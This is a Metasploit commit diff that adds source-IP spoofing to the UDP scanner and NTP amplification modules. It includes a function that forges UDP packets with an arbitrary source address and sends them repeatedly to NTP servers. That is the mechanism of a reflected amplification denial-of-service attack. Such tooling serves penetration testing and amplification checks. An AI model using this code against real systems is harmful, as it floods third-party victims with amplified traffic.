Land #3834, @jabra-'s updates to UDPscanner to support spoofing

2014-09-22 11:49:53 -07:00 · 2014-09-22 11:49:53 -07:00 · 4e9f1282de
parent ebacb26e51 e86b18cdd4
commit 4e9f1282de
9 changed files with 51 additions and 32 deletions
--- a/lib/msf/core/auxiliary/drdos.rb
+++ b/lib/msf/core/auxiliary/drdos.rb
@ -8,6 +8,22 @@ module Msf
 ###
 module Auxiliary::DRDoS

+  def initialize(info = {})
+    super
+    register_advanced_options(
+      [
+        OptAddress.new('SRCIP', [false, 'Use this source IP']),
+        OptInt.new('NUM_REQUESTS', [false, 'Number of requests to send', 1]),
+      ], self.class)
+  end
+
+  def setup
+    super
+    if spoofed? && datastore['NUM_REQUESTS'] < 1
+      raise Msf::OptionValidateError.new(['NUM_REQUESTS']), 'The number of requests must be >= 1'
+    end
+  end
+
  def prove_amplification(response_map)
    vulnerable = false
    proofs = []
@ -43,5 +59,9 @@ module Auxiliary::DRDoS
    [ vulnerable, proofs.join(', ') ]
  end

+  def spoofed?
+    !datastore['SRCIP'].nil?
+  end
+
 end
 end
--- a/lib/msf/core/auxiliary/ntp.rb
+++ b/lib/msf/core/auxiliary/ntp.rb
@ -1,6 +1,6 @@
 # -*- coding: binary -*-
 require 'rex/proto/ntp'
-
+require 'msf/core/exploit'
 module Msf

 ###
@ -10,6 +10,7 @@ module Msf
 ###
 module Auxiliary::NTP

+  include Exploit::Capture
  include Auxiliary::Scanner

  #
@ -29,5 +30,15 @@ module Auxiliary::NTP
        OptInt.new('IMPLEMENTATION', [true, 'Use this NTP mode 7 implementation', 3])
      ], self.class)
  end
+
+  # Called for each IP in the batch
+  def scan_host(ip)
+    if spoofed?
+      datastore['ScannerRecvWindow'] = 0
+      scanner_spoof_send(@probe, ip, datastore['RPORT'], datastore['SRCIP'], datastore['NUM_REQUESTS'])
+    else
+      scanner_send(@probe, ip, datastore['RPORT'])
+    end
+  end
 end
 end
--- a/lib/msf/core/auxiliary/udp_scanner.rb
+++ b/lib/msf/core/auxiliary/udp_scanner.rb
@ -69,6 +69,24 @@ module Auxiliary::UDPScanner
    scanner_postscan(batch)
  end

+  # Send a spoofed packet to a given host and port
+  def scanner_spoof_send(data, ip, port, srcip, num_packets=1)
+    open_pcap
+    p = PacketFu::UDPPacket.new
+    p.ip_saddr = srcip
+    p.ip_daddr = ip
+    p.ip_ttl = 255
+    p.udp_src = (rand((2**16)-1024)+1024).to_i
+    p.udp_dst = port
+    p.payload = data
+    p.recalc
+    print_status("Sending #{num_packets} packet(s) to #{ip} from #{srcip}")
+    1.upto(num_packets) do |x|
+      capture_sendto(p, ip)
+    end
+    close_pcap
+  end
+
  # Send a packet to a given host and port
  def scanner_send(data, ip, port)

--- a/modules/auxiliary/scanner/ntp/ntp_monlist.rb
+++ b/modules/auxiliary/scanner/ntp/ntp_monlist.rb
@ -46,12 +46,7 @@ class Metasploit3 < Msf::Auxiliary
    ], self.class)
  end

-  # Called for each IP in the batch
-  def scan_host(ip)
-    scanner_send(@probe, ip, datastore['RPORT'])
-  end
-
-  # Called for each response packet
+# Called for each response packet
  def scanner_process(data, shost, sport)
    @results[shost] ||= { messages: [], peers: [] }
    @results[shost][:messages] << Rex::Proto::NTP::NTPPrivate.new(data)
--- a/modules/auxiliary/scanner/ntp/ntp_peer_list_dos.rb
+++ b/modules/auxiliary/scanner/ntp/ntp_peer_list_dos.rb
@ -34,11 +34,6 @@ class Metasploit3 < Msf::Auxiliary
    )
  end

-  # Called for each IP in the batch
-  def scan_host(ip)
-    scanner_send(@probe, ip, datastore['RPORT'])
-  end
-
  # Called before the scan block
  def scanner_prescan(batch)
    @results = {}
--- a/modules/auxiliary/scanner/ntp/ntp_peer_list_sum_dos.rb
+++ b/modules/auxiliary/scanner/ntp/ntp_peer_list_sum_dos.rb
@ -34,11 +34,6 @@ class Metasploit3 < Msf::Auxiliary
    )
  end

-  # Called for each IP in the batch
-  def scan_host(ip)
-    scanner_send(@probe, ip, datastore['RPORT'])
-  end
-
  # Called for each response packet
  def scanner_process(data, shost, sport)
    @results[shost] ||= []
--- a/modules/auxiliary/scanner/ntp/ntp_req_nonce_dos.rb
+++ b/modules/auxiliary/scanner/ntp/ntp_req_nonce_dos.rb
@ -35,11 +35,6 @@ class Metasploit3 < Msf::Auxiliary
    )
  end

-  # Called for each IP in the batch
-  def scan_host(ip)
-    scanner_send(@probe, ip, datastore['RPORT'])
-  end
-
  # Called for each response packet
  def scanner_process(data, shost, sport)
    @results[shost] ||= []
--- a/modules/auxiliary/scanner/ntp/ntp_reslist_dos.rb
+++ b/modules/auxiliary/scanner/ntp/ntp_reslist_dos.rb
@ -36,11 +36,6 @@ class Metasploit3 < Msf::Auxiliary
    )
  end

-  # Called for each IP in the batch
-  def scan_host(ip)
-    scanner_send(@probe, ip, datastore['RPORT'])
-  end
-
  # Called for each response packet
  def scanner_process(data, shost, sport)
    @results[shost] ||= []
--- a/modules/auxiliary/scanner/ntp/ntp_unsettrap_dos.rb
+++ b/modules/auxiliary/scanner/ntp/ntp_unsettrap_dos.rb
@ -34,11 +34,6 @@ class Metasploit3 < Msf::Auxiliary
    )
  end

-  # Called for each IP in the batch
-  def scan_host(ip)
-    scanner_send(@probe, ip, datastore['RPORT'])
-  end
-
  # Called for each response packet
  def scanner_process(data, shost, sport)
    @results[shost] ||= []